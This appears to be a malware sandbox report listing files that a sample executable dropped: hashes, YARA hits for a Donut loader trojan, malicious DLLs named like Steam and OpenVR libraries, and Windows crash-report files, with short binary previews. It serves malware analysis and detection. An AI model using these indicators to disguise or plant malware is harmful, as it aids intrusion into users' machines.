SSDEEP:	6144:+QcbSMsxv8q5WH3/A18ZPXY7QVg9b7XxnJs5myz+nEutX7I6ysB:+QjMsxvuH3/AI7Vg9PXxnby6nEsI6JB
MD5:	8D64D97085F6AA11D1375879095D996C
SHA1:	8D0E50F76AE515F024B349DD3B893ABDC5D6F75F
SHA-256:	57C15F61210E60E0204CF5BD0AAA0984BAF363B7D7FB82DB576DA919C223DC64
SHA-512:	E6D8E2223018B2CCC95A0EAC4434EB33363BFA2355770B23108D27C72B06E7825B00A3A5F7D0FCBB5886049275F3DF5C726B4CEBE5F4AC9034ECCB2EE9B339DC
Malicious:	false
Yara Hits:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Program Files\Weekplus\mpclient.dat, Author: unknown
Preview:	..............l..pu.k.\|.s....;.,.N_ZI)&.......8.K9yQ.n.s.\S\.uEe1.K..A....7.._..6.\.;M.R..(K.i5..E.q..zx..0......0....=...P.Cn.h.....h.\|........V}.B.p.....7Td4.!...y9.<,.z.M.V>--..s\....t...f.qP,......F..FNo.g8hn...x1+ZO...0.ll.)I...mJ....4 ..8....83r.h; .`y.@...K1_...U......8h..:g..P..by..]F2c{.0.\..F....-.....RWYf..`.....c.C.!.R.E._\|O`$.[.JH.3.s#.KC.:......P...&..j..D..B.....B...n.W%4....T..t/xi..3.D....W..4\2.%ek0.W.z6..N.p....C.. u.Tn;.BitV..K...i'......OY..... .......c0...k:..%'.]T..d...e....QV....R........3)........Z....................g.....?...F..H.k....K..]3g.....9.`.^.+.`k+f..!jvl..y......A;.73...BMs.Q....t+.j...(.l.....G....J\.%.i.>..m`....Y....).......).s.l.{..= EJ..&....G<....GZ..}..:.u..E.....}.\..G?.....X.VC^E..).{..r00$W...Z..g}.w.j..c._...p...\|6..O.@'..ei..).D..B....I..lzj....}<..h....W%..%^..f....bw>R.b......_..H..at..~...0......6....:..#..w....2zr..A.....=..t.Q..D..:e{\U..]&...ME*.dO.T...<...G..h......\."n.bSp....;

C:\Program Files\Weekplus\mpclient64.dat

Download File

Process:	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe
File Type:	data
Category:	dropped
Size (bytes):	38357
Entropy (8bit):	7.207891252927893
Encrypted:	false
SSDEEP:	768:0L43tvq/w0F813CGwM1hltW9cS7iKGztVuanh8w2OfJ7ejaP6yEqzeGO0gf:73oF8QGwM1gcS7i9u6yeNejY6yFOB
MD5:	064A2C07C19EB983C114B318216E2492
SHA1:	FB8A8CB6D37AFE380FB1151512BE33DB06E4926C
SHA-256:	2E5A9A6E7D7B0FB13F1889ED29E9652814033DE163B3DB5CE634C2196474102F
SHA-512:	AF25A9A7793F7FB543AD350FAC27220E0541F51C0F667FBE25395820D29BD57748FFB3505062E82B70AD169D9A2B17D68FA07426C8B9E2BBF0732E338A260BEE
Malicious:	false
Yara Hits:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Program Files\Weekplus\mpclient64.dat, Author: unknown
Preview:	..3...3....;^U..g.O..mFb...1\|s..."4m..........8..X...dt.#..M)=...Q.T.p.t'+<...."028..w..4.C4.vA5.$QF .5......].."..._.......m...k...~..$...4-..K.....1#..D0.S....ql......i...2.7...%..<c.P.@4}.A.~Hbm-...F........b.JY..2.6....8....l..<.z...-.l..zdRE.j.>...w...'}...iW{<.t.W.}..p..<X..i.w..5....K..q....";.b.Y.f. ...t+...tb1....ES@.K..#..<,.`....4.tn^....' .;...9Ci..e5@. .Y.9E..x!"p1>.d.`M.0..c....._..H....7....X?...P.T.-uf4#.2.^bs.K.J....e......KN.am./..v.........G........._q..........].P.H.f..._.,...JG.,%.L...gj.b.pW..X^)..;O....................@...,.....c%T..m.@M..!#.g5-.9...z...3.s......~.\|V...km..3Ba...'....>l.P.,.=<m4...uC..W.j..W.%.,XR.`R%>..d.4..,ut./}S.........`...[...b/Q....G.f..;`}D.".s..K...@...2.,@l.l/J..y.1#..K...2.....\.9..8...m.w..>.g.\...L.:C.J.1i....(T.<..........J..G..z....F.<.$F.M.I........R....J..g%..\.OS.C.....Hf...........O.v{.9M....}.,.2..3.R.u...-...........!......s....u.;..^......D.=C.....r...C...cW.q.7).:..B..k5.&.

C:\Program Files\Weekplus\openvr_api.dll

Download File

Process:	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	379904
Entropy (8bit):	5.713104943501391
Encrypted:	false
SSDEEP:	6144:Z9AtI+wngo0iXh3/DQ7oAsjn/hyMBU2zJfg7BsqJ5t:Z9GI+wngo0iXh3/h1BUmJe
MD5:	366710963F426B54B6E06657B26A5CBB
SHA1:	A22A7313BE3F311FF14E9FCB406C7F7C5A9CF08C
SHA-256:	EF1DAFE72F4EDC90E500A5E5FEF04479F3BFE54AF856D00C046028799058E8D2
SHA-512:	AC1FF25DAEA694F33C314A4E98D5E8998554AD096CEB054F8F152770A5A235F184FDC0BF68B944FCE0C791FF5369349E4701D047DBBFB83E2720F26DC457738C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ..NA..NA..NA..<....A..<...BA..<...FA..^..GA..^..@A..^..kA..<...KA..NA..(A.....OA.....OA....v.OA.....OA..RichNA..................PE..d...=W.g.........." ...).(.......... ........................................@............`.............................................@... ...<.... ...........5...........0...... f..8............................d..@............@...............................text...M&.......(.................. ..`.rdata..xQ...@...R...,..............@..@.data...P#...........~..............@....pdata...5.......6..................@..@.fptable............................@....rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................

C:\Program Files\Weekplus\steam_api64.dll

Download File

Process:	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	301928
Entropy (8bit):	6.481950937605796
Encrypted:	false
SSDEEP:	6144:LV5AmlcQZIcT8e4RO882MnuyqO2CHKOcJra:h5AmllZAQuyH2CqFda
MD5:	543515A345CC88CB93413953F06F34A4
SHA1:	0C67FF54AFA0E53F82659ABEEEA0D8AB1DCAD1ED
SHA-256:	DCFAA13AA419A0641917205957DBE15AA472E7CF09A28CF8D3CF429598E67799
SHA-512:	7010AB1549480FF00A66FD90A7EDB7E6028DE234DBC6FC7FC12BFB528174F84850B6713A3DE0797FC8BCDFAB5B2A52846E97B370BFA24185EAD1F64B7A0132BA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@.......................................VLV......n...\|.di..{.g..p...?\|w.....(U.....R...g\...4.Bc....C.w..s~...Xuf..n..i./.-@.$...B`.9.N...G.l......Y...F........f...B..rV....C.....)................................................PE..d....\|.d.........." .....h..........P.........@;....................................;q....`..........................................G.......+..P............p..$$...n..h-......T.......T.......................(...0...8............................................text....g.......h.................. ..`.rdata...............l..............@..@.data........@.......$..............@....pdata..$$...p...&...6..............@..@_RDATA...............\..............@..@.rsrc................^..............@..@.reloc..T............f..............@..B........................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_#U6c47#U8054#U65_216329f15446f2b8c3a5289c0fe9c4b73214d_6b7b5bfd_7fa7792f-7ddb-47c5-8ccd-4ba2ab9f3a72\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.4699430120126493
Encrypted:	false
SSDEEP:	192:NgM1Oe0TYpPx7aWzvlPLyIWwQx2zuiFIZ24lO8u:G0OFT+Px7a4NDDCx2zuiFIY4lO8u
MD5:	AE466B005637FEE4A78B829F9BBD7D46
SHA1:	2DDA5A63D09FC8FFADD8330F8ECA46FEDF387675
SHA-256:	66E690F0D7C79FA5BCE503A7E751F67848847CDB46D86AAB6BFD3C0876B96B18
SHA-512:	0497C76CCB88A483A05432CD711C3A9D59064966F6ADC54094D531DEDB17EE1500F3EEF2F6C31EF7A9A274D27AB16E69C2F78997593AE0940C04AE8CA18015E0
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.5.0.5.0.7.5.5.2.9.0.8.1.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.5.0.5.0.7.6.8.7.2.8.4.1.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.f.a.7.7.9.2.f.-.7.d.d.b.-.4.7.c.5.-.8.c.c.d.-.4.b.a.2.a.b.9.f.3.a.7.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.f.b.f.7.2.a.8.-.5.e.a.9.-.4.e.1.6.-.8.6.c.1.-.f.d.b.8.7.e.2.2.7.e.e.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.#.U.6.c.4.7.#.U.8.0.5.4.#.U.6.5.2.f.#.U.4.e.d.8...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.X.M.M.5.5.6...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.0.4.-.0.0.0.1.-.0.0.1.4.-.f.c.1.c.-.d.c.5.2.1.4.6.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.b.b.4.a.1.5.c.a.3.d.6.f.5.e.0.d.1.8.1.6.2.9.f.d.b.6.7.c.6.e.e.0.0.0.0.0.0.0.0.!.0.0.0.0.c.8.9.d.8.4.a.4.0.0.7.5.a.2.c.5.3.d.a.3.b.e.5.e.b.1.7.e.3.f.d.9.5.d.6.b.7.c.c.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_GamePlusPlus.exe_c9764143e078c6f7f2798a7b2834e710aeda4b32_54de7261_2c21655a-d008-4b91-954d-7b01efd5dfbc\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	TeX document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1146500170767555
Encrypted:	false
SSDEEP:	192:+QMg1dR0hT88WS2jdvS27rn2RGzuiFNZ24lO83e:cqdSho8yjlcwzuiFNY4lO8u
MD5:	8F5302CBD50606CDA65EDA121580239A
SHA1:	81DF82547978888B9314736A58A087F5D0DB70E6
SHA-256:	A707A3329A74F031C4D2697E99673F4880FFC46102EB7C8C9F08DB129B2DAD2D
SHA-512:	65641DC2647B053DC4B4CBA4D79AE8744C12027F4897BB58A854E2844BADFD2B3DD1EBC6CB981F31AFBC406A5EB9589262F41C881EBA76F783E32B8314ACEBC6
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.5.0.5.1.3.4.7.6.1.6.5.6.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.5.0.5.1.3.5.1.2.6.6.5.0.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.c.2.1.6.5.5.a.-.d.0.0.8.-.4.b.9.1.-.9.5.4.d.-.7.b.0.1.e.f.d.5.d.f.b.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.b.a.c.8.f.0.5.-.2.4.2.9.-.4.2.0.f.-.b.0.3.f.-.a.4.a.7.d.f.d.1.4.c.b.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.G.a.m.e.P.l.u.s.P.l.u.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.v.r.d.a.s.h.b.o.a.r.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.a.4.-.0.0.0.1.-.0.0.1.4.-.6.a.c.c.-.b.9.8.8.1.4.6.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.c.4.0.7.0.a.d.a.1.c.7.3.5.b.c.9.d.0.0.b.a.2.b.a.c.6.2.5.1.2.c.0.0.0.0.0.9.0.4.!.0.0.0.0.5.8.8.a.b.4.2.d.8.c.7.f.1.5.1.5.b.c.1.1.0.0.8.6.8.c.6.2.c.1.a.2.9.1.9.2.2.9.0.6.!.G.a.m.e.P.l.u.s.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_GamePlusPlus.exe_c9764143e078c6f7f2798a7b2834e710aeda4b32_54de7261_a3044e01-85db-4e22-b3b1-bca5cac206c0\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	TeX document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1148801516310487
Encrypted:	false
SSDEEP:	192:lxiq216OR0hT88WS2jdv267mX1RmzuiFyZ24lO83e:7iZrSho8yjlswzuiFyY4lO8u
MD5:	BD8EE14278ABF00A3077C93916CD2ACA
SHA1:	C4165DF1FF3BD213F33521C3892F8E9C57059135
SHA-256:	B52EFC923A79D8A0768D57AE416290BFCCB2082725B5139A5F459289ADB08CEA
SHA-512:	D9D3BE4684CBE5B177A8608B8D0A8F271308793F222925BA90C1A4F4EA30DA7D29CC9275551042FC85D6F90BDC723E90C9B191BFB8736F832B930FEA9645F3FF
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.5.0.5.1.9.4.7.9.3.0.4.5.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.5.0.5.1.9.5.3.0.4.0.4.2.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.3.0.4.4.e.0.1.-.8.5.d.b.-.4.e.2.2.-.b.3.b.1.-.b.c.a.5.c.a.c.2.0.6.c.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.e.2.6.5.1.3.c.-.7.6.b.6.-.4.5.b.1.-.9.5.4.9.-.c.f.4.0.9.9.8.0.9.7.0.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.G.a.m.e.P.l.u.s.P.l.u.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.v.r.d.a.s.h.b.o.a.r.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.0.-.0.0.0.1.-.0.0.1.4.-.f.3.3.f.-.7.d.a.c.1.4.6.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.c.4.0.7.0.a.d.a.1.c.7.3.5.b.c.9.d.0.0.b.a.2.b.a.c.6.2.5.1.2.c.0.0.0.0.0.9.0.4.!.0.0.0.0.5.8.8.a.b.4.2.d.8.c.7.f.1.5.1.5.b.c.1.1.0.0.8.6.8.c.6.2.c.1.a.2.9.1.9.2.2.9.0.6.!.G.a.m.e.P.l.u.s.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_GamePlusPlus.exe_c9764143e078c6f7f2798a7b2834e710aeda4b32_54de7261_ea7bb66d-8dc3-4b8e-b9a7-d202b9eabf7e\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	TeX document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1143961358154355
Encrypted:	false
SSDEEP:	192:pSVYi1UR0hT88WS2jdevq7QuFcuzuiFIZ24lO83e:cVY4USho8yjg1uzuiFIY4lO8u
MD5:	A29B6F47D6A20807458BACF65392373B
SHA1:	74638872FE7CFCDA4592ED7F31D329F62AC1FA7A
SHA-256:	62999BD26290E5D3EC84BAEA397C2C74D5E625E2E04CD75443D9C4E5A34252B4
SHA-512:	E3CECEBA116FEB0E4A8E463402A8DB2632F6087D1007488A5ED51C2AB48783A53067B4D5E5FE4C4EEECA40BBA6E09E2CB13059E51ADE96AFE1C7081A892ABA99
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.5.0.5.0.7.8.1.2.0.9.5.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.5.0.5.0.7.9.4.8.2.9.6.3.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.a.7.b.b.6.6.d.-.8.d.c.3.-.4.b.8.e.-.b.9.a.7.-.d.2.0.2.b.9.e.a.b.f.7.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.5.9.7.5.2.8.b.-.6.a.2.e.-.4.2.5.e.-.a.0.7.2.-.8.f.b.e.d.3.0.b.f.0.f.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.G.a.m.e.P.l.u.s.P.l.u.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.v.r.d.a.s.h.b.o.a.r.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.7.8.-.0.0.0.1.-.0.0.1.4.-.e.d.e.8.-.9.7.6.6.1.4.6.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.c.4.0.7.0.a.d.a.1.c.7.3.5.b.c.9.d.0.0.b.a.2.b.a.c.6.2.5.1.2.c.0.0.0.0.0.9.0.4.!.0.0.0.0.5.8.8.a.b.4.2.d.8.c.7.f.1.5.1.5.b.c.1.1.0.0.8.6.8.c.6.2.c.1.a.2.9.1.9.2.2.9.0.6.!.G.a.m.e.P.l.u.s.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER63E5.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Jan 16 12:46:34 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	163268
Entropy (8bit):	1.6442864429749406
Encrypted:	false
SSDEEP:	384:Rqx2w+TkOb1k1H64YIN4YvsVGDhkk2GaaachLehQSLpIiBkPTOAuV315n1TD2Rg:Rg2w+TkOb1yYE9htRaaaJhQCpPNto
MD5:	649315CA4FA2C72785340A598A7DDA7A
SHA1:	D00B89086693063A2174D35063CBA68DE1D7DFFD
SHA-256:	1455FB69BE9CBE6B988B1D46750B99D49C1EECD9191007F064858872F7FAA68C
SHA-512:	8DA8289C14C24216359A8E5BAF650E33610CA03120A16AA16ED32243C1450BA155F9E51CA2AF11DBA8352CC93D964FACF79CEA3ADF773E78DFD41A0B6C99D52A
Malicious:	false
Preview:	MDMP..a..... ..........g........................d...........$...,'..........Hb..........`.......8...........T............3..$J..........P'..........<)..............................................................................eJ.......)......Lw......................T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER64FF.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6820
Entropy (8bit):	3.7176754263051826
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetb1HuGen3YzvzQ8zMxSO5aM4UG89buTDHYf0Vam:R6l7wVeJ1HufY/xv2prG89buTkf0Vam
MD5:	618DBF67CDF013EE9D503CA4016EB17C
SHA1:	F6ED5C1445DFC3B540D4044FEE2B6DD4D5177D5F
SHA-256:	08A7C277B35474E6D39CABA39B75FA7E0FD8EE01645EA2561810F93BACB20F5B
SHA-512:	73A807A294470E22BD1423F014D31C27EC371C5E4DB840438B065D67F507EF9B32671FE147C73F2A11F05327FE7D056EA151C1AABE07926A04816F14FF8A2FD5
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.7.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER652F.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4876
Entropy (8bit):	4.486448104106179
Encrypted:	false
SSDEEP:	48:cvIwWl8zsliJg771I9kCw5WpW8VY2Ym8M4Jd1jFUkyq8vo1mBhy7+3Sud:uIjfSI7mH7VSJdxWocBhy7+iud
MD5:	915A6266C7DA8FE8B4CED49534F6C004
SHA1:	0A6705D887653ACAD813D1F104A990DDD9A2E4D0
SHA-256:	83B789F9C81E4349F10E31DDEAECDB99DC298AFF35452DB24C796B26A89E75BF
SHA-512:	83475FA0A3E196A574CD9733C607D3CE95E228CA41A6336994E291DBA2B3C3077AF5E56044736680C16D222C7394D41AA28371298565A5EBDCAD4F5B9E8CA852
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="678469" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7975.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Jan 16 12:45:34 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	167308
Entropy (8bit):	1.6112668414756401
Encrypted:	false
SSDEEP:	384:Yvw+TtObCBJUzY+LZcQcWRzBYflt0qvRMvPD+ovdXP:Yvw+TtObCB+L2QzBYNrWFl
MD5:	34C89F0E7EA8EE49DD97B0576BDF7FCD
SHA1:	1148ADC3C4D0ECA8831E84D492AF7709736657B1
SHA-256:	547A59B19144D0C5D5C8C3BFD58D8DF5B3B389A5E85FED9896FCCF7B6CD203BF
SHA-512:	24F4A9F3F39F0665AF8C094BC2FBA37BDA610A03C439D52703A4A43847B3026ED73352BBADF3CACE0AD0DDB1FDCE3538FFADD0D40A50D9878E33FE4BB5890B29
Malicious:	false
Preview:	MDMP..a..... .......n..g........................d...........$...,'..........Hb..........`.......8...........T............3...Y..........P'..........<)..............................................................................eJ.......)......Lw......................T...........n..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7A41.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6626
Entropy (8bit):	3.717246031252855
Encrypted:	false
SSDEEP:	192:R6l7wVeJij/4OwSY/xv2pr989bNKff1vm:R6lXJU/NY/p5NCfA
MD5:	1888B1B8570D6E051F154A43D33C4226
SHA1:	8107D040F799ACAC753E6147292F8FB193E6C2BB
SHA-256:	9F3A4887084C8C6ED7DB1E1D384A54EBB67F3A631FEED79107432536F3D86A40
SHA-512:	D9C4A8E8F9975F039D6467352F78F5C7D188A50ED5B48226BAD9E55527EBB9C6F90FC033D16EFDB6F67B0F787A6044F6314CC38AE24089C99A6CED030BA960AC
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.0.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7A61.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4876
Entropy (8bit):	4.484326909796199
Encrypted:	false
SSDEEP:	48:cvIwWl8zsDJg771I9kCw5WpW8VYgYm8M4Jd1jFfyq8vo1Phy7+3Syd:uIjfdI7mH7V0JdzWohhy7+iyd
MD5:	8EDCE36A872A410ECCE3D18BA33CDF15
SHA1:	3BBF6DD2955EAE7B6E5DB4F99B89BCA9327CCE3B
SHA-256:	838971CCE2331E8F7785BA70C638E0A07510CE62CA87E02B5016D13C98230689
SHA-512:	DBE74D975BF0D82575872F17BFDCB16AF68FB9E7A8E64A13D9D1094A0A4BB7CFB75B3D07F0FEA04DBFCDD59289280F8E7A39B2856CC515149E97097F85095FEB
Malicious:	false
